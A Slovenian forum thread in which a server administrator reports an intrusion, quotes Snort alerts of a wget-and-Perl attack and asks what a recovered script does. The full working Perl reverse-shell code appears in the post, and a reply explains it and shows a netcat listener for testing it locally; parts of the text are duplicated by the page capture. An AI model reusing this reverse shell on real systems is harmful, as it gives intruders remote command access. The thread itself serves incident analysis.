Forum » Operacijski sistemi » Vlom v server, kaj dela ta skripta?
Vlom v server, kaj dela ta skripta?
meacho ::
Ugotovil sem, da so mi ulomili v server, verjetno prek phpbb foruma.
Load se mi je zelo povečal, zato sem pregledal procese in našel tega: perl temp2006 12.24.28.5 3303
kot je razvidno s snort poročila so z wget funkcijo na server skopirali svojo skripto in jo pognali:
Apr 26 20:54:47 **** snort[2312]: [1:1330:6] WEB-ATTACKS wget command attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80
Apr 26 20:54:47 **** snort[2312]: [1:1356:5] WEB-ATTACKS perl execution attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80
Zanima me kaj izvaja vsebina te skripte ki sem jo našel na serverju, Nod jo prepozna kot Linux/Mare.E, vsebina pa je:
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i")
Zanima me torej kaj ta skripta naredi? Backdoor? DDos?
Kja naj sedaj naredim s serverjem? Kot sem gledal ni nobene spremembe...
Load se mi je zelo povečal, zato sem pregledal procese in našel tega: perl temp2006 12.24.28.5 3303
kot je razvidno s snort poročila so z wget funkcijo na server skopirali svojo skripto in jo pognali:
Apr 26 20:54:47 **** snort[2312]: [1:1330:6] WEB-ATTACKS wget command attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80
Apr 26 20:54:47 **** snort[2312]: [1:1356:5] WEB-ATTACKS perl execution attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80
Zanima me kaj izvaja vsebina te skripte ki sem jo našel na serverju, Nod jo prepozna kot Linux/Mare.E, vsebina pa je:
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i")
Zanima me torej kaj ta skripta naredi? Backdoor? DDos?
Kja naj sedaj naredim s serverjem? Kot sem gledal ni nobene spremembe...
64202 ::
To je remote shell, HISTFILE=/dev/null pa naredi, da se history ne belezi v .bash_history.
Sicer pa lahko probas tkole:
- v enem terminalu pozeni 'netcat -l -p 5000'
- v drugem pa pozeni skripto 'perl skripta 127.0.0.1 5000'
(v prvem t. mas zdaj remote shell)
Sicer pa lahko probas tkole:
- v enem terminalu pozeni 'netcat -l -p 5000'
- v drugem pa pozeni skripto 'perl skripta 127.0.0.1 5000'
(v prvem t. mas zdaj remote shell)
I am NaN, I am a free man!
Zgodovina sprememb…
- spremenilo: 64202 ()
64202 ::
Tam kamor se je pa poskusla zadeva povezat, je pa verjetno avtomatski server, ki poslje rootkit.
I am NaN, I am a free man!
Zgodovina sprememb…
- spremenilo: 64202 ()
BigWhale ::
> Kja naj sedaj naredim s serverjem? Kot sem gledal ni
> nobene spremembe...
Reinstaliraj ga.
> nobene spremembe...
Reinstaliraj ga.
meacho ::
Server sem pregledal z rkhunter in chkrootkit, pa ni noben nešel nič sumljivega...
A je za nalaganje rotkita treba dešifrirat kakšno geslo?
Čudno mi je namreč, da je bil load zelo visko ko je bila skripta zagnana...
A je možno da mi niso naložili rootkita?
Res se mi ne da še 1x vse nalagati.. Čeprav verjetno mi res ne uide..
A je za nalaganje rotkita treba dešifrirat kakšno geslo?
Čudno mi je namreč, da je bil load zelo visko ko je bila skripta zagnana...
A je možno da mi niso naložili rootkita?
Res se mi ne da še 1x vse nalagati.. Čeprav verjetno mi res ne uide..
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | Skripta branje UDP paketovOddelek: Programiranje | 966 (800) | t0r0 |
» | Linux varnost (strani: 1 2 )Oddelek: Informacijska varnost | 7224 (5764) | fiction |
» | Blokada Skypa?Oddelek: Omrežja in internet | 2032 (1817) | ABX |
» | Skripte (strani: 1 2 )Oddelek: Programiranje | 8897 (6760) | Microsoft |
» | Vdor v ClarkConnect?Oddelek: Operacijski sistemi | 2035 (1847) | Nerdor |